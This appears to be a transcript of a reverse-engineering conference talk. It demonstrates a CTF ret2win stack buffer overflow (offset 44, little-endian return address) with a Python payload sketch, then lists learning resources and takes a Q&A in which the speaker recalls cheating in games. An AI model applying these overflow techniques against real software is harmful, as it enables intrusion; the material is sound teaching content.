and run we can see some stack values whatever we don't see anything that exciting but if we continue running from there then we see that it's going to prompt us for input and it says we're going to fit 56 bytes of user input into 32 bytes of stack buffer what could go wrong a lot of you here already probably know but we're gonna see if we can overflow that buffer so here we're just putting in a non-repeating pattern that I just made with uh I believe pwntools and then we just enter that when it asks us for input and we see what we have and here we have a program that crashed so let's

talk about specifically why that crashed because that's why this matters um so we can see invalid address 616161 blah blah blah so we also see that same value in EIP so if we were a budding reverse engineer and we wanted to know why did that crash the program we would look into what EIP is and see that it's an instruction pointer and then we would be like oh okay this this pointed to something that doesn't exist there is there is no 6161c instruction like that's that's why it crashed it reached to that for the next instructions that it can continue running and that was just completely unavailable um so that being said that's what we

know let's create our exploit so one of the important things from that is we know like okay we put a value that we wanted to put into EIP so therefore we can influence what that value will do and so what happens if we just stuff the memory location for our ret2win function into the buffer overflow at the point where um that value is read into EIP so we see in our non-repeating pattern that laaa occurs at the 44th character so we know that that's where we want to input that um that value and then we see if we're looking at the ret2win function it starts at zero eight zero four eight six

two c as the memory location and so we just write a simple little uh buffer overflow exploit in here in Python and we're printing uh 44 A's in a row and then we're feeding it that memory location backwards because it's little endian so we have 0804 862c and then when we run that we can see that we get our flag and I wish I could do that live but I think it would be too uh too time intensive unfortunately but so there we've stuffed that input in and then it goes to here and then it crashes and why does it crash because like the rest of the stack is just filled with garbage because we did a buffer overflow
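The payload described above (44 filler bytes followed by the ret2win address written backwards) can be sketched with only the Python 3 standard library. The offset 44 and the address 0x0804862c are the values quoted in the talk; the simplified pattern generator and the function names are assumptions for illustration, and this is not the pwntools pattern algorithm, although the chunks it produces start the same way (aaaa, baaa, caaa and so on).

```python
import struct

RET2WIN_ADDR = 0x0804862C   # address of ret2win as read out in the talk


def simple_pattern(chunks=26):
    """Simplified non-repeating pattern: aaaa, baaa, caaa, ... (illustrative)."""
    return b"".join(bytes([ord("a") + i]) + b"aaa" for i in range(chunks))


def offset_of(crash_bytes, pattern):
    """Number of bytes that come before the chunk that landed in EIP."""
    return pattern.find(crash_bytes)


def build_payload(offset, target):
    padding = b"A" * offset
    # "<I" packs a 32-bit unsigned integer little endian, least significant byte first
    return padding + struct.pack("<I", target)


pattern = simple_pattern()
offset = offset_of(b"laaa", pattern)          # the chunk named in the talk
payload = build_payload(offset, RET2WIN_ADDR)
```

Writing the payload to the program's standard input as raw bytes, for example with `sys.stdout.buffer.write(payload)`, sidesteps the Python 3 bytes printing annoyance mentioned earlier in the talk.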

if you really wanted to mess around with this you could then figure out okay well how do I make sure it doesn't crash when I do that like how do I replicate what needs to be in there for this to actually return to main or something um that is the end of my presentation um so definitely thank you guys all for being here if you want to learn more about this sort of thing I would recommend following pretty much all of these folks um especially the top two these both of these women have made incredible learning content um if you want to get samples VX underground is good they do require a password so I would message them on

Twitter because there's sort of a meme that the password is infected but really you have to go bug them um if you want to read some books about it if you were going to get only one book off this list POC or GTFO is fantastic um I have a Blog that I guess I could have linked to on here it's 8x86re.com if you follow me on Twitter or add me on LinkedIn or something from the speakers page then it's probably pretty easy to follow there and a friend of mine does a lot of ASCII art so I have them on here too but um yeah I probably didn't leave enough time for questions or anything

but just holler at me I'm not going anywhere so yeah thank you guys so much for listening to me thank you wow that was an excellent talk as somebody who did get a degree and took classes in reverse engineering I will tell you that uh that 45-minute talk did cover several weeks of an entire semester-long course so I'm a bit jealous um yeah uh we do have time for probably like one or two questions does anybody have anything any hands I do have a question um when uh at the start you said you were reverse engineering some games um because he had some trouble with games where your reverse engineering um so really when I got my start in a

lot of this stuff it was in the context of like griefing with my friends because I was just an angry dumb teenager um so a lot of that was like Day of Defeat Team Fortress original Team Fortress 2 World of Warcraft um really anything like it's sort of like antivirus in a way anti-cheat so like anything with VAC we felt pretty comfortable working on Valve Anti-Cheat um World of Warcraft is mostly botting because I was like selling gold in college because I was just a freaking bum but yeah bunch of sweaty nerd games for sure any questions and see any hands so I'm assuming there are no questions all right one more round of applause for

Marc [Applause]
